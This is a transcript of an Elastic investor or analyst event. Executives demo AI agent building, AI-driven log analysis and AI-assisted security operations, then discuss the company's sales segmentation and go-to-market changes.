They've got a multimodal model that allows you to do searching in the images, searching in the embedded text and charts and graphs inside of other documents. This multimodal search is really important. That efficiency part is also important. They just released a new V3 of the re-ranking model last week that has a novel approach to the way that they do re-ranking. What it really allows them to do is provide a highly efficient model. It runs fast. It runs efficiently. It does that while giving leading-class accuracy. Really impressive work that the team has done. Couldn't be happier to partner with them going forward. It's not just about Jina AI. Every major player in the AI ecosystem has an integration with Elasticsearch. It's because they all recognize how important relevance is to getting successful AI implemented in businesses. All of these partners, we partner with them very closely.

We talked about some of the work that we're doing with NVIDIA on GPU acceleration. We're also inside their AI factory along with Dell. We've got integrations to every one of the agent-building frameworks like LangChain and LlamaIndex who are here today, and so forth. This idea of being able to be the most flexible platform to integrate anywhere, it's central to our strategy. There's not going to be one model that's better than all of the others in rules. There's not going to be one agentic AI framework that wins. We want to make sure that no matter where you're starting, no matter what you're using, that you can use Elasticsearch to provide the relevant context to that application. This really leads into not just the models, not just the integrations, but the platform and the product itself. When you think about Elastic, it's a search engine.

It's a vector database. It's a NoSQL store. It's a columns store. It's a geospatial store. We have all of these capabilities, and we wrap it up in a single API. That's a lot for a developer to learn to be able to just get started and start building applications. We're continually working to simplify that process. When you bring data into Elastic, we use our first-party ELSTER model by default out of the box to generate embeddings for you so you can get hybrid search without having to learn about what's a vector anyway. You don't have to start by doing that. If you have a model that you prefer, if you fine-tune a model specific for your environment, great. You can plug it right in, and there's a place for that.

I mean, this progressive disclosure of complexity, we really think about this a lot and how we can simplify the experiences for our users. Nowhere is this more true than in the agent-building space. If you think about all the steps that it takes to build an agent, I pick a framework, get a language model, connect those things together, set up memory, figure out how to write queries against the engine, it's a lot of steps that people can take. If you already have a framework, we partner with them. It's great. You have the best possible experience there. If you're just starting with your data, you're saying, what can I do with this? We want to do a lot to make that easier. That's why we introduced earlier today our Agent Builder feature.

This is really designed to take any data that you have inside of Elasticsearch and instantly make it available for agents in chat and to build and extend from. Rather than try to describe it, why don't I just show it? If we can switch the laptop over, please, to the demo. Let's take a look. All right. Fantastic. You've seen that? Good. What we have here, this is a live running cluster on Elastic Cloud Serverless. What I did is I loaded up just a simple set of data. This is a financial services data set here. It's got some account data, some sort of semi-structured data around accounts, assets, and holdings, and then a lot of unstructured data, which is very representative of what we've seen in a number of our customers.

News data, you know, financial analyst reports, and then interactions between our financial advisors and the customers. I've done nothing other than that. I've just loaded the data. When I come up to the system, right out of the box, I've got a new tab. I've got a new experience in the UI that says agents, and I can start asking questions. Now I can start asking questions of the system. What's going to happen here is I'm asking the question, the system is now the agent, the built-in agent that we provide as part of Agent Builder, is going to look at the data that it has in the system.

It's going to use a set of native tools, understands my question, using this, picks an index that it's going to search, writes the query, crafts this query, and then runs the query, passes that result back to the language model, and we're going to see the answers coming back in terms of what it actually believes from the reports, what it's going to see. Right now, what I just did would normally take a developer days, hours, maybe even weeks, if you're just learning this technology, to go and assemble all of the moving parts to answer this kind of a question. You can keep going with these kinds of conversations. You can say sort of like, what are my customers? You can start to now just continue to ask these kinds of conversational questions with the data right out of the box.

Again, I've done nothing to customize the system. I just loaded the data and started a conversation. This is how it should be. This is a POC. The time it takes to understand what kind of applications can I go and build on top of this went from days and weeks to seconds. You can start that conversation. If I wanted to go further and say, hey, this is great. This looks like this is going to work for me. Now I want to customize this. I want to put this application in front of my actual financial advisors. I want to customize the system to make sure the most common tasks, the most common workflows are great. For that, we give you an ability to customize the tools.

When I said before we want it simple out of the box, but still to have the full power of Elasticsearch at your fingertips, this is where custom tools come in. I can come in and I can define a custom tool. In this case, I know my financial advisors are going to be doing summaries of portfolios on a regular basis. I can add this custom tool, and I can do that with the full power of the Elasticsearch query language. Here, I'm doing joins across the structured portions of the data. I'm doing hybrid search using a semantic search and a lexical search against the content and the news that might be related to this portfolio. This ability to use the full power of Elasticsearch to customize it and provide that as a tool back to the language model is really powerful.

This is the first way that you can customize the agents that you build with Elastic. The second thing that you might want to do is actually change the way that the agent engages. Out of the box, the default agent we provide just generally tries to be helpful and answer the questions with whatever data it has. If I'm going to put this in front of a specific type of user, I want to customize it. I want to give it more specific instructions. How do I help the users more? How do I make sure that this knows exactly what tools to take advantage of? Here you can see this custom agent that we created has a very specific prompt to help out human advisors, financial advisors. We've got that set of tools, including the custom one we just looked at.

With nothing more than just a customized set of instructions and a custom prompt based on Elasticsearch query language, I can now start chatting with this specialized agent and start to ask a new set of questions. I can ask a question like this: Who are the top customers? Again, just like we saw before, this agent is going to look at the tools that it has available, figure out what's the best strategy for getting the answer out of Elasticsearch. It's going to then figure out, OK, in this case, I need to write an ES|QL query. Great. Let me write that query to figure out who our top customers are, go out, run that query, bring the results back. It's really nice because this is, again, a capability that's provided right out of the box. What you can see here is it's able to bring this data back.

It sees that it's tabular data. It sees that this is the kind of data that probably belongs in a chart, automatically starts charting it for me. Over time, I can customize. I'll be able to add this right to a dashboard straight from here to start building a regular view on top of the data. If I come in and I wanted to just kind of look even more closely at some of the particular accounts, right? Let's say I'm getting ready to meet with a customer. I can ask for a specific summary of that portfolio. Now I can ask a more sophisticated question. Look at their portfolio, summarize it for me, then look up, we have further investments for the portfolio that they have, what's related in the news that might be interesting that they're going to ask about when I have a meeting with them later.

This idea here is going to trigger the model to, again, go and look and say, what tools do I have available to answer this question? That custom tool that we took a look at before, the portfolio summary tool, is exactly what's needed for this sort of a query. I can go from having that top-level query that says, who are my top customers, to a quick summary of their portfolio, and then an understanding of how AI-related news might be affecting them. This idea of combining your structured view with your unstructured view is incredibly powerful. This is, again, the second major feature here. I just created a custom agent in like five minutes on stage live. This is incredibly powerful for accelerating the process of building these applications. It's not just about answering questions. This is really nice. It's also about taking actions. I can do this.

I can actually say, email this to one of my colleagues. What's going to happen here is it's going to say, OK, great. Looks like you want to take an action. This is what Ash referred to as the workflows feature. We've added a new set of capabilities for taking multi-step complex actions into the system. This ability to find these workflows is actually a set of technologies and capabilities we acquired from Keep. We acquired, I think, two or three quarters ago, really quickly integrated that. We can see the send message here very quickly looking it up. What that's doing is it's actually going to our workflow system. It's using this system to look up who is the contact that we want to send it to.

Let's look them up in the database, retrieve their email, their contact preferences, and send the right kind of message to that user. You can imagine how these workflows can get a lot more interesting over time. This is just a taste. This is how we make actions available to these agents. The last thing that I'll touch on before I get to the end of the demo is everything that we saw today, everything that we looked at, everything from these charts to the interactions, the whole thing, this is all a set of APIs in Elasticsearch. It's wonderful we provide this chat experience. If you want to bring your customers, your employees directly into Kibana to access it, that's great. If you already have an application where you might already be sending your users, you can extend that. These are just APIs.

The tools are available over MCP, a very common way to connect agents to data. The agent itself is available over A 2 A, so you can embed it directly into an agentic UI. This is just a sample of what you could build on top of Elasticsearch with those chat experiences as a native part of it. You can see here, able to just bring up the single account that we had just looked at with Elasticsearch queries directly. We can pull out the chat experience, and we can actually have that same kind of a conversation with the same agent that we just created right here in this custom application.

This idea of being able to easily walk up to your data in Elastic and start a conversation with an agent, extend that agent specifically for the workflows and the tasks that you have, connect that into your business and take action, and then build that into the experiences where your users are, is a dramatic simplification to what it takes to build these kinds of agentic applications. With that, can we switch back over to the slides, please? Just close out with one more here. The thing that I wanted to just end on is the opportunity that we see in the AI space is huge. I think it's a very simple story, right? We see, and I hope it's clear at this point, that relevance is more important than ever before in the agentic world, in the AI-powered world. Elasticsearch is the best platform for relevance.

That means that our opportunity is massive when it comes to this emerging market opportunity for AI and context engineering. With that, let me hand it over to Santosh to talk about our Security and Observability businesses.

Santosh Krishnan
Group VP and General Manager of Security and Observability, Elastic

Thanks, Steve. That's amazing. I'm Santosh Krishnan. I'm the GM for our Security and Observability businesses. I'm really excited to share with you some of our AI innovations, as well as the platform advantages that we are bringing to the Security and Observability spaces. Starting with Observability, as Ash mentioned, in Observability, customers typically start their journey with us with log analytics. They use our platform to efficiently store all their logs and then use the platform capabilities in search, machine learning, and AI in order to triage and investigate issues. That's the primary purpose where we land most of our customers in Observability. Over time, many of these customers have organically grown, even in many cases without our product. They've organically grown to add additional signals like metrics and traces and so on to bring together and use our entire end-to-end Observability suite.

One of the main reasons they do that is that they can now correlate all of these signals using a single platform, a single query language, a single set of workflows. This is the main reason why they actually come to us for end-to-end Observability, all the while taking advantage of all the data store optimizations that Ken spoke about, the LogsDB, the TSDB, all the specific optimizations that we have made for those signals. Customers benefit from that as well. The Observability space itself is changing. We have already seen a couple of generations. We have gone from legacy Observability tools, which are really just alerting engines. They are health monitoring tools. It tells you what happened. It does not really help you what to do about the thing that just happened. Those used to be the first generation of Observability tools.

I would say we are currently in the second generation, where there is an added focus on triage and investigations. Unfortunately, though, that added focus has come with very complex instrumentations that you have to build into your data sources so that you may investigate your issues later. Dealing with messy, unstructured data, which is prevalent in Observability, it's actually a fool's errand to try to lend structure to it or try to solve it using instrumentation and such. AI to the rescue, because things are changing again. Observability is changing again, because harnessing the power of AI and all of that information, that dense information that resides in your logs in order to triage and rapidly resolve your issues is now going to be the focus of the next generation of Observability.

Make no mistake, logs with AI will be the foundation of how you do investigations in this next generation. Together, as we have spoken about, OpenTelemetry is the other trend that is also happening at the same time. This is really the industry's way of trying to get away from all this complex instrumentation to understand the semantics of data and so on and so forth. We recognize that. We adopted it. We contributed to it. When you combine AI and OpenTelemetry, you essentially get to this next generation of Observability. Of course, it's our goal to leverage our natural advantages in dealing with unstructured data and using the native AI capabilities to help our customers go through this journey.

To summarize why we win, customers continue to choose us for our platform advantages in speed, fast investigations, efficiency in storing all of those signals in Observability, and those specific data store optimizations which I mentioned. More recently, customers have started selecting us for our native AI and relevance capabilities in order to investigate faster. I'll speak a little bit more towards that in a minute. We bring all of these innovations in an open and extensible fashion. We have always been open source. Now, with OpenTelemetry, we have gone all in. Over here, of course, we want to take this burden of instrumentation away from SRE teams. Logs are back. Now I'm talking about the modern generation of Observability. If you actually look at all the signals that you use in Observability, logs are the most information-dense signals which you have at your disposal.

Your metrics and infrastructure monitoring can tell you what happened, what went wrong. Your traces and your application monitoring tools can tell you where something went wrong. You can trace, as the name suggests. In order to do deeper investigations, you always have to go back to the information which is in logs in order to understand why something happened. Logs have always been the repository of knowledge which answers the why question. Now, with AI, you can actually harness all of that dense information that's already sitting. It's already sitting in your data store in order to get to rapid issue resolution faster. By the way, today in Elastic, we already offer our customers a combination of search capabilities using ES|QL that Ken talked about, machine learning capabilities for anomaly detection and such. We recently just introduced this capability called Streams to just make logs magical.

To give you an idea, even setting Elastic aside, in any Observability tool today, if you want to get all the value out of logs, you need to understand where the logs are coming from. What are the sources of these logs? A human has to understand that, build integrations and such. You have to understand what is contained in those logs so that I may know later what to look for. This is especially true because logs are messy and it does not come with structure, a priori structure, and semantics. Last but not the least, OK, I've figured all of that out. I now have to also decide I need to figure out what questions to ask. When there is an issue, I have to go back to the system and figure out what queries to run, what questions to ask.

These have been burdens on the SRE teams until today. We are taking all of those burdens away in understanding where your data is coming from, gleaning what it contains, as well as suggesting what one ought to be looking for when time comes for investigation. With that, I actually want to show you I'm going to invite David Hope, who is a leader in our product team, to show you what we just introduced.

David Hope
Director of AI-powered Observability Solutions, Elastic

Thank you very much, Santosh. Right. Just get rid of Steve. As Santosh was saying there, logs are back. Of course, you may not have seen them, but trust me, they're everywhere. You click a button on your remote control, you make a trade, large volumes of log lines are generated. They're used by practitioners to understand your experience or how quickly your trades are going through. Today, logs are incredibly difficult to work with in any Observability solution. The Observability industry has left a lot of room on the table to get a lot of value out of logs. Engineers today have to code integrations. They have to create complex pipeline processing code, and they have to know exactly where and what to look for when they're doing investigations. Off-the-shelf integrations, like the ones you see on the screen here, help a little bit.

Quite often, you can't find the integration you need. Application developers writing custom application code don't usually use a standard pattern or format, making it incredibly difficult and time-consuming to process logs. With Elastic Streams, we're changing things. No need to install any integrations anymore. No need to fully understand all your log sources. All you do is point your logs at Elastic, and we take care of it. No more complex pipeline processing code to manage. No more trying to figure out what systems your logs belong to. No more hunting high and low for integrations. The magic here is the LLMs are amazing at understanding unstructured data. Elastic, with its expertise in logs and context engineering, means that Elastic Streams can automatically organize your logs, find meaning in your logs, and find problems in your logs.

In this new world where logs flow smoothly to Elastic without any pre-ingest pipeline processing overhead, the first thing that practitioners want to do is organize their logs. What we do is, like any good filing system, we look at the data to understand exactly how to organize our logs. We do this with AI. I click here, suggest partitions with AI, and the AI goes off. It's found two systems, a Hadoop system and a Spark system. Perfect. I now have my logs nicely organized, and I can find what I need very, very quickly. The next thing that practitioners want to do, now that we've had our logs organized nicely, is find the meaning in their logs. You heard today a lot about unstructured data. The majority of our customers send logs to Elastic in unstructured formats. Doing analytics on unstructured data can be pretty tricky, right?

If you took like a written piece of text and you tried to put it in your Excel function, you probably wouldn't get a great result, right? Elastic is making things different here, right? We're an expert in dealing with unstructured data. What we can do with Elastic Streams is we can find the patterns and the meaning in the logs and the context. Let's just take a look at what that looks like here. I can create a processor, and I can use AI to look at the logs. You can see straight away that it's found the patterns in our log files. It's not just found the patterns, but there's some contextual data in here. All we gave it was the log file, and it has inferred that there are stock symbols, quantities, and prices in here.

Obviously, we're using trading data because we want to bring this into your language a little bit. Now, once I apply what it's found, you can see straight away that I can now do really nice analytics on this data, like trying to find what the most popular stock is over a particular time frame, for example. I can quickly save that and move on to one of the most important things that practitioners want to do. We've organized our logs, we found meaning in our logs, but now we want to find problems in our logs. We need to make this easy. I don't want to drown in logs or dig around trying to find queries that I need to find problems. I use significant events, and significant events can quickly find problems in our logs for the specific systems that we're working with.

Here, you can see that it's detected that this is a Spark system, and these are specific problems that relate to Spark systems. I can bring these into Elastic, and all of a sudden, we can monitor our Spark systems for things like out-of-memory errors or where a task execution is performing correctly. When I do that, our machine learning-powered change point detection can immediately discover whether or not any of these problems have occurred. I'll give you an example here, this out-of-memory error. If we dig into this, we can see the query that was generated by AI, and we can see all of the logs that relate to that out-of-memory error. I can quickly dig into one of these, which makes lives a lot easier for practitioners, as you can imagine. It automates the investigative process and root cause analysis.

Here, if I use our AI Assistant to ask what this message is about, I can immediately see the root cause of the problem with the Spark system. It's given me all the information that I need to see what the problem is. It's recommending how to fix that problem too. In summary, organizing logs, finding meaning in logs, and finding problems in logs has been a problem that has plagued the Observability industry. Elastic, with its expertise in applying AI to unstructured data, is bringing clarity to this chaos. We're bringing agentic AI and LLM technology to logs, to organize logs, to find meaning in logs, and to find problems in logs in minutes, not hours, so that your trades can go through successfully. Thanks, Santosh.

Santosh Krishnan
Group VP and General Manager of Security and Observability, Elastic

Thanks, David. Yeah, it's a good one. Thank you. To summarize in Observability, as you can see in this future where we bring to bear the power of logs and our ability to deal with unstructured data in general and how we apply AI towards automating that root cause analysis, our objective is, of course, to grow our market share in logs as logs themselves become more important in the age of AI. We are growing beyond logs as well. That's our additional opportunity on top of what I said. If logs are the center of investigations, our objective is to grow, to expand from that center by adding those additional signals towards the multi-signal observability end-to-end offering. Those are the two main opportunities in front of us in Observability. Switching to Security, you will see a lot of similarities there.

In Security, customers typically start their journey with us with SIEM and security analytics use cases. This is largely to displace or replace their existing SIEM, or in many cases, to also augment them as well. We do have both displacement as well as augmentation customers today. The goal over here is exactly similar to the one which I showed in Observability, which is to, in this case, modernize your security operations center using the combination of the search, machine learning, anomaly detection, as well as the AI capabilities that we offer. Over time, and on the backs of a lot of investments that we have made on endpoint and cloud protection, many of our customers are now organically growing into those areas as well. From the same platform, single click, you would go into our console, add endpoint. Now, suddenly, we are actually your XDR solution as well.

It is not just the ease of use and tool consolidation why people usually grow into these other use cases with us. We actually offer a truly unified platform approach to bring all signals, whether they are coming from endpoints, identity systems, firewalls. You can use all of these signals together for your detection and investigation needs. We are fast gaining momentum in endpoint security. We have been making investments both in our threat research as well as in our agent capabilities for on-device blocking, remediation, forensics, all of those features that you expect in EDR tools. On the back of all of that investment, we are now being recognized as one of the top-tier endpoint protection systems out there by third-party benchmarks like AV Comparatives and such. When you look at how the Security space, SIEM, security analytics, that entire space is evolving, that is changing as well.

One might even say it is changing even faster than the Observability space. Here, we actually went from legacy SIEM systems, which is all about compliance, compliance, visibility, single pane of glass to see all your alerts in one place, and so on and so forth. It is the next generation of SIEM, SIEM 2.0, Next-gen SIEM, whichever name you want to use, the current generation of SIEM, where we actually expanded beyond that into actually finding issues. Detecting issues with rules and machine learning, workflows for investigation, response, and remediation, all of this got added in the second generation of SIEM. We have been beneficiaries of that. When I said that customers have been adopting us to displace their legacy SIEM, we have grown on the back of that transformation. That is changing again as well.

With AI, and this is not just a matter of adding an AI assistant or copilot or something to your existing SIEM, with AI, every key workflow that InfoSec analysts use is getting automated by AI. By every key workflow, what I mean is all the way from ingesting data, writing your detection rules and dashboards and other content, triaging alerts and investigating attacks, finding the risk posture of your IT infrastructure, running workflows to take remediation steps. These are, I would say, the main things that you do with a SIEM. All of them are getting transformed with AI. Make no mistake, while we were beneficiaries of the previous generation, we are actually leading the charge over here. There is no customer conversation in Security that I now have, which is not about modernizing their SOC with the AI capabilities which we offer.

We have been first to market in it. I'll show you a few of those in a minute. Why Elastic wins in Security? Customers do choose us still for the benefits of the Elastic search platform in terms of its speed. We are the fastest security tool out there for doing things like threat hunting and such, efficiently storing all your security data so that you don't have to pre-filter things away using ingest pipelines and such, because the moment you pre-filter, you will lose some threads in the data which you draw. We offer those benefits. As I said, we are redefining the SIEM as we speak. We are actually leading the charge over there. We do win because of that already over the last year and a half or so. Last but not the least, we actually provide a true platform for unifying all your signals.

This is why we are actually starting to win in XDR. That's because it's really our architecture. We are not taking a SIEM in one place and EDR in another place, drawing a circle around it and calling it a platform. It's actually a true platform that brings all the signals together for your consolidated detection, investigation, and response needs. Let me speak a little bit more about what we have done when I say that we are embedding AI everywhere. Over the last year and a half or so, and I'm not even going to talk about our AI Assistant, which, by the way, was the first one in the industry in the Security space, we have actually embedded AI workflows throughout our product. We introduced a capability called Automatic Import. This is to onboard your data.

By the way, things like import used to take months and months in that initial part of the implementation. Now it takes weeks at worst. We introduced a capability called Automatic Migration program so that you can bring all your rules and dashboards from your existing tools. They get migrated automatically into Elastic. Last year, a little more than a year ago at RSA last year, we actually introduced this capability called Attack Discovery. What that does is instead of your InfoSec analysts getting inundated by all the alerts that your detection rules and machine learning jobs actually found, it coalesces all of those alerts into a few attacks that matter. Now the InfoSec analysts, instead of looking at each alert to triage, can actually go into those attacks and go investigate them and spend their time in a prioritized fashion.

This has been one of the most well-received capabilities in our Security offering over the last year. We have made a lot of those innovations in AI. We are even allowing our customers to use our AI capabilities on top of their SIEM tools and XDR tools because we want to meet them on their journey on where they are so that they can add AI capabilities as an entry point and then, over time, migrate the rest of the SIEM onto Elastic as well. This is something that we introduced this year. The Elastic AI SOC engine goes by the colloquial term EASE. Now you can easily adopt Elastic with AI. Coming soon, we are going to be introducing the Elastic workflow engine that Ash Kulkarni talked about on the backs of the acquisition of Keep, as well as AI-based entity analytics.

Instead of talking about all of those, I'm going to invite James Spiteri, who is a leader in our product team in Security, to actually show you some of that.

James Spiteri
Director of Product Management, Security, Generative AI, and Automation, Elastic

Perfect. All right. Hello, everyone. Let's dive right into Security. Can yo u all see this? Perfect. Just as David described how challenging it is to work with logs, security teams face a very similar daunting challenge with what we call alerts. Every day, they log into their security analytics platform, and they're faced with screens like this. They're faced with situations where, within a 24-hour period, they have 1,000 alerts or warning messages to deal with. These could all potentially indicate something bad happening within their enterprise. These alerts can span multiple systems, multiple networks, multiple technologies. The traditional way of trying to find out, hey, is this something I should investigate? Are they related? Are they not? Is to go through each and every single one of these manually and try and figure that out.

As Santosh, as everyone else was saying about a year and a half ago, once the Security industry was figuring out how to embed AI, we released Attack Discovery, where users don't have to go through that mess of alerts anymore. They go from 1,000 things to deal with to, in this case, we reduce that down to nine active attacks for them, nine attacks within their organization which matter most. We've made this so simple for our users that any analyst of any skill level can understand, and it will work across all types of alerts and all types of data sets. This particular ransomware attack, for example, we explain it very clearly in natural language. We very clearly highlight the hosts and other entities involved. We describe what we call the attack chain.

As an attacker within my environment, what did they do to actually be successful with this attack? It's a really easy way for someone to digest and understand. Just to see the impact of how powerful Attack Discovery is, this one attack alone is made up of 148 of those alerts. Can you imagine a human being sift through all those 1,000 alerts, find these 148, stitch them together, and write out the story nicely and neatly? It would have taken hours. That's, unfortunately, what the industry has been used to. Last year, as Elastic, we changed the game thanks to the power of our platform and large language models. Of course, usually what would happen next is, as a security analyst, I would need to grab this and do root cause analysis.

I need to find out within our organization, how do we go from an attack like this one to be able to eradicate and contain the threat? Of course, this is something where our AI Assistant, our conversational agent, comes into play. Traditionally, before this stuff was available, analysts would have hundreds of wikis or pages and procedural documents that they would need to follow. They would have to manually sift through them or use traditional searches to try and find keywords here and there. That no longer works in this particular situation. We've brought Search AI platform to the mix. We've grounded the responses from the AI Assistant with their own data.

Now, for this particular attack, they have an extremely tailored guide of what they should be doing within their organization, really clear steps to follow, really clear evidence and advice of what to do next. We've generated queries for them in case they want to dig deeper, so on and so forth. As an example here, one of the first immediate steps that the assistant has told me is, look, you're going to want to take this host offline. You're going to want to eliminate the spread of this ransomware by isolating this host. Thanks to our XDR capabilities, as an analyst, I'm able to grab this remediation guidance from the assistant and straight away run it in what we call our response console, meaning any endpoint which I'm monitoring with Elastic Security, I can take this action right within the same window.

We're able to do that because of our advancements with XDR . We can support multiple different systems with this. You can see already how much easier we've made the lives of our users with Attack Discovery, with the assistant, and many other AI features that we've implemented. We want to do even more. We want to be able to eliminate the few manual clicks that I did today. This is where workflow automation is really going to come into play. We're going to be able to not only tell analysts when an attack happens or give them remediation advice, we're going to be able to do all the triage for them manually. We're going to be able to provide these agentic AI flows to eradicate the threat.

They go from having to look at a view of alerts or a view of attacks to going to a view like this, where, hey, look, we already triaged this with AI for you. We've decided we can close these alerts. Perhaps this alert needs a bit more work. We're going to assign it to this particular user. At the end of the day, what the user actually ends up with is a message like this, where, hey, here's what we detected in your environment. Here's everything we did when we detected that threat. We took this host offline. We quarantined some files. We created a case for you. We reached out to whoever is involved in this attack. There might be a few things left for you to do. We're going to tell you exactly what to do.

This is the future with workflows, which is really exciting for us. We saw with Steve the power of Agent Builder and the conversations we can have there with agents and also with workflows. What we've done, as Steve already demonstrated, is we've brought workflows to Agent Builder. In the Security world, our users are going to have potentially hundreds of these workflows that they've built, hundreds of automations that are going to run automatically in the background or perhaps on a schedule. They're immediately transferable to Agent Builder, so people can converse with them without having to do any additional work, which is really phenomenal power to be able to give our users. In this example here, I have my Agent Builder.

I've created what we call a threat hunting agent, an agent specifically designed to work with security data, whether that's structured or unstructured text, but also be able to take some of these actions with workflows. What I'm going to do is ask a very typical question that a security analyst might want to ask. I'm going to ask, look, can you provide a summary of the top 10 processes run by administrator? What this is going to bring to me is full natural language searching of our structured and unstructured data at the same time. Agent Builder is going to identify what it should do. It's going to do that thinking step here. It identified, in this case, I'm going to run a query. It found the top 10 processes run by administrator. Some of these I recognize, but some I don't, especially this one.

I don't really recognize this here as an analyst. It's really caught my eye as something I want to investigate further. What I'm going to do is ask Agent Builder here, look, what is this particular process? Agent Builder is going to identify what it needs to do to give me that answer. It's going to grab what we call a hash, which is a unique identifier for that file. It identified it should run a query to do that. Then it's going to look up that hash, that unique identifier, against what we call a reputation system. Is this file malicious? Have any other vendors seen this particular file? In this case, it said, yes, this is a malicious file. It broke this down to me in a way that's really easy to understand. It did that by invoking a workflow to pass that hash onto this reputation service.

The next thing I might want to do is, OK, we know we have some form of malicious file in my environment. I need to open up an incident. I need to make the people who are on call aware. I don't want to really leave the screen. I want to keep investigating with Agent Builder, but I also want to start that process. We're going to ask Agent Builder to go ahead. We're going to say, look, can you please check who's on call? That's the first thing we're going to ask them to do. Create a Slack channel for this incident. What we want is to also summarize all the findings so far. See how many instructions I'm giving Agent Builder here. Add the person who's on call, add the on-call user to the Slack channel, and explain what steps to take next. A long list of instructions.

Typically, I would have to go to some other system, find out who's on call, manually go create a Slack channel, or go somewhere else to run the workflow, and so forth. In this case, Agent Builder is going to go ahead and do that for me. It checked our on-call schedule, which is unstructured text in this case. It found who's on call. It identified that to create a Slack channel, it needs to call the workflow to do that. It added the on-call user, who in this case is also James, to that Slack channel. Lastly, it summarized everything that James needs to do. If we go to our Slack here, we'll be able to see all of that. This channel was just created. You can see 3:40 P.M. James was added and given all the information he needs to continue this investigation.

To recap, we went from a world where our users are manually investigating thousands of alerts. We fixed that with Attack Discovery. We allowed our users to eradicate the threat using assistant guidance with our XDR platform. Now, with Agent Builder, we've brought the full functionality of context engineering to the security user to be able to contain, eradicate, and solve security incidents. Santosh, back over to you.

Santosh Krishnan
Group VP and General Manager of Security and Observability, Elastic

Thanks, James. It's amazing. Let me leave you with a summary of our opportunity in the Security space. As you can see, behind all the innovations which you actually just saw, our opportunity here is to grow our SIEM market share. Mind you, we are already doing well in the SIEM space. We are one of the fastest growing vendors in that space. Our opportunity is to grow that market share further through, again, displacement and augmentation strategies, which I mentioned earlier, so that we can help our customers realize this future of the AI-powered security operations center. An additional opportunity that we have is to grow beyond SIEM, largely into use cases like XDR and CDR by providing that same unified platform. You can bring all your data together into a true platform to detect, investigate, and respond across your entire IT real estate.

With that, let me actually bring Ken back on stage to summarize.

Ken Exner
Chief Product Officer, Elastic

I'll wrap up. Thank you. Just to wrap up the product section, I think you hopefully see that we have a lot of conviction that we have a huge opportunity in AI. I'm going to summarize it as two opportunities. One is we have an opportunity to become a fundamental part of the generative AI and agentic AI tech stack. As a vector database, as a context engineering solution, we have an opportunity to be part of that tech stack. I think the other opportunity that I'm super excited about is using those same tools ourselves to disrupt the Observability and Security space.

I think the Observability and Security space are going to see a lot of change because of AI. There are lots of manual things that happen in these two spaces. There is lots of pattern matching, things that are going to be much better done by machines than by humans. I think we have an opportunity because we are developing these same tools to lead in that disruption of Security and Observability. With that, I'd like to end the product section. We're going to have a break now. We're going to take about 12 minutes. If we can be back in the room at 3:55 P.M., we'll go through the go-to-market and finance sections. See you at 3:55 P.M. Thank you.

Mark Dodds
Chief Revenue Officer, Elastic

Good afternoon. I'm excited to talk to you today about the transformation we've been driving in our go-to-market part of our business and to share with you the momentum we're seeing and the opportunity ahead. Ash mentioned to you that we have the advantage of incumbency. We're trusted by leading organizations around the world across all segments. Our Search AI platforms provide incredible value to customers for Search, Observability, and Security. I'm telling you, we are just getting started. Now, many of you know I came to Elastic 20 months ago as Chief Revenue Officer. After I arrived, we embarked on a process to evaluate and assess our go-to-market motions, our systems, our processes, and our teams. We took a number of actions to get better as an organization. We're seeing results now, and we're refining and making refinements to continuously get better. This is a never-ending process for us.

All of this is designed for us to serve more customers and drive more growth for Elastic. I wanted to share with you some of the improvements we've made in areas we focus to drive our execution. Number one, segmentation and coverage. I'm going to double-click on this in a minute. What we found is that we had outgrown our previous model. We had an opportunity to do a better job of aligning our sales capacity to our largest opportunities. Number two, incentives. We've aligned our sales incentives to drive incremental growth for Elastic and capture the AI opportunity that we have. Number three, operational rigor. We're running the sales organization with a much higher degree of operational rigor.

This includes everything from how we forecast, how we generate and track demand, how we progress pipeline through the funnel, how we make sure we have hygiene in our pipeline, how we review deals. All of this is being done at a much greater level of granularity. Importantly, we're doing it consistently around the globe, up and down the organization. None of that would be possible without, number four, improvements in our systems, our tools, and our underlying data. My RevOps team has done a great job here transforming how we run the business. We've also made improvements in generating demand, creating pipeline. We track this every two weeks in great detail. Our marketing team is doing a better job than ever. Our sales development team is doing a better job of processing those leads. Our sales team, our partner organization, is generating more and more opportunity.

We focused our teams on three specific sales plays, which I'll share with you in a minute. The other area that I'll highlight is we've gotten better at hiring. We've reduced the cycle time for hiring. We're now tracking that with the rigor that we do our forecasts. We've gotten much better at onboarding and enabling our sellers. We've invested in an underlying enablement platform that we didn't have before. We've gotten more structure, and I'm really happy with the results. Now, let me jump in for a minute on segmentation and coverage, because I know this was a topic of conversation five quarters ago. Like most tech companies, at a high level, we segment the market between enterprise, commercial, and SMB. SMB for us is our monthly cloud business, our product-led growth.

What we wanted to take a look at after I got here is how are we assigning accounts? What was the logic we were using to assign accounts into enterprise, commercial, and SMB? How many accounts did we have assigned in each? How did we assign sales coverage to those accounts within the segments? What we found is we had outgrown the processes we were using. We weren't aligned to best practices, and we weren't taking the best advantage of our sales capacity to our greatest opportunities. We went through a process of evaluating all of our accounts by looking at their total addressable spend, what they spend on the solutions we sell, their propensity to buy Elastic, and that took into account a number of variables, and their historic spend. We used that to place accounts in the right place.

Now, we've evolved this, and I'll share with you at a high level how we segment the market today, still enterprise, commercial, SMB. The top in enterprise, we've subsegmented. A small number of our largest potential customers are in strategic. That's where we have our densest sales coverage. The bulk of our enterprise accounts are in this enterprise block. What we've done here, particularly in our large markets where we have density, we have reps and entire teams focused on one of two motions, either expanding with existing customers or landing new logos. We've followed that same logic in commercial. You can see the commercial expand, commercial hunter segments, and then we built out what we call commercial general business. We literally moved thousands of accounts out of enterprise, out of commercial, or out of the top two levels of commercial into general business.

Not that these accounts aren't important, but they represent smaller opportunities. We wanted to align our coverage and our cost of that coverage to those opportunities. We built out an inside sales team at lower cost. This allowed us to do a couple of things. One, our enterprise and our expand and hunter commercial account executives now have a dramatically less number of accounts, so they can focus on those accounts to go deeper in the case of expand. For hunter and going after new logos, they focus on the accounts that have the greatest opportunity. As I mentioned, we have territories and we have teams focused on one of those two motions, so they can get really good at it. Before, our account executives had a large number of accounts. They were a mix of install base and white space accounts, and they weren't able to be proactive.

What we're seeing now is that we're in opportunities. We're winning deals in places with customers that we've never been before because our reps have more time to focus. In addition to this work, we've made strategic investments in the field in other areas to drive greater customer intimacy, to drive productivity of our account executives, and to shorten our sales cycles. The customer architects listed here on the screen, these are our post-sales engineers that work with our customers to get the most value out of Elastic. They help our customers take advantage of the latest features, like what you saw demonstrated here today. They also help our customers optimize their implementations to make sure they're running efficiently, because we know if our customers are using Elastic efficiently and they're using our latest technology, they're going to be customers for life.

